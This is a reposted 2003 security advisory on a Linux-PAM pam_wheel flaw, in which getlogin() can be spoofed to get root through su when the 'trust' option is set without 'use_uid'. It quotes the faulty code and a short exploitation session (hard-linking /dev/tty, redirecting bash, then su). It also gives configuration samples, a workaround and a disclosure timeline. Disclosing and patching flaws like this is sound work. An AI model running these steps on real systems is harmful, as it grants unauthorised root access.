|
Brought to you by:
Suppliers of:
|
|
|
| |
| The Pluggable Authentication Module (PAM) is a flexible mechanism for authenticating users. A vulnerability in PAM allows in the case where appropriate configuration options are enabled, and the attacking user is a member of the wheel group is currently logged in, to spoof log entries, or, in the worst case scenario, to obtain super-user privileges depending on the PAM configuration settings. |
| |
Credit:
The original advisory can be obtained by going to:
http://www.idefense.com/advisory/06.16.03.txt
The information has been provided by iDEFENSE Labs, the vulnerability has been discovered by Karol Wiesek.
|
| |
Vulnerable systems:
* Linux-PAM version 0.77 and prior
The pam_wheel module of Andrew G. Morgan's Linux-PAM uses getlogin() in an insecure manner, thereby allowing attackers to bypass certain restrictions. The pam_wheel module is often used with su(1) to allow users belonging to a trusted group to utilize the command without supplying a password. The module utilizes the getlogin() function to determine the name of the currently logged in user. This name is then compared against a list of members of a trusted group as specified in the configuration file. The following is a snippet of the offending section of code:
fromsu = getlogin();
if (fromsu) {
tpwd = getpwnam(fromsu);
}
...
...
...
/*
* test if the user is a member of the group, or if the
* user has the "wheel" (sic) group as its primary group.
*/
if (is_on_list(grp->gr_mem, fromsu) || (tpwd->pw_gid == grp->gr_gid)) {
if (ctrl & PAM_DENY_ARG) {
retval = PAM_PERM_DENIED;
} else if (ctrl & PAM_TRUST_ARG) {
retval = PAM_SUCCESS; /* this can be a sufficient check
*/
} else {
retval = PAM_IGNORE;
}
} else {
If the "trust" option is enabled in the pam_wheel configuration file and the "use_uid" option is disabled, any local user may spoof the username returned by getlogin() and gain access to a super-user account without supplying a password. The following is a sample exploitation scenario:
$ w
10:32am up 3:26, 2 users, load average: 0.01, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 7:13am 3:03m 0.30s 0.22s -bash
farmer pts/0 172.16.60.5 10:32am 0.00s 0.00s ? -
$ logname
farmer
$ ln /dev/tty tty1
$ bash < tty1
$ logname
root
$ su -
# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Configuration Sample:
The following is a sample default invulnerable entry from /etc/pam.d/su in RedHat 7.3:
# Uncomment the following line to implicitly trust users in the "wheel" group.
#auth sufficient /lib/security/pam_wheel.so trust use_uid
The following is a sample entry in /etc/pam.d/su that would be vulnerable to the described attack:
# Uncomment the following line to implicitly trust users in the "wheel" group.
auth sufficient /lib/security/pam_wheel.so trust
Workaround:
When utilizing the pam_wheel module, enable the use_uid option. Doing so should prevent the login name spoofing from circumventing PAM restrictions.
Vendor fix:
Andrew Morgan does not plan to release a new version of Linux-PAM, however, Linux-PAM 0.78, which does fix this flaw, is obtainable via the following CVS: http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/pam/Linux-PAM/
Linux distributors will be releasing their own updates as appropriate.
Disclosure timeline:
21 OCT 2002 Issue disclosed to iDEFENSE
22 NOV 2002 Andrew Morgan (Linux-PAM maintainer) notified
23 NOV 2002 Response received from Andrew Morgan
25 NOV 2002 iDEFENSE clients notified
14 DEC 2002 Patch provided to iDEFENSE for validation
14 JAN 2003 Issue fixed in CVS
09 JUN 2003 Andrew Morgan contacted re: availability of next stable release
09 JUN 2003 vendor-sec@lst.de informed of CVS updates
16 JUN 2003 Coordinated public disclosure
|
|
|
|
|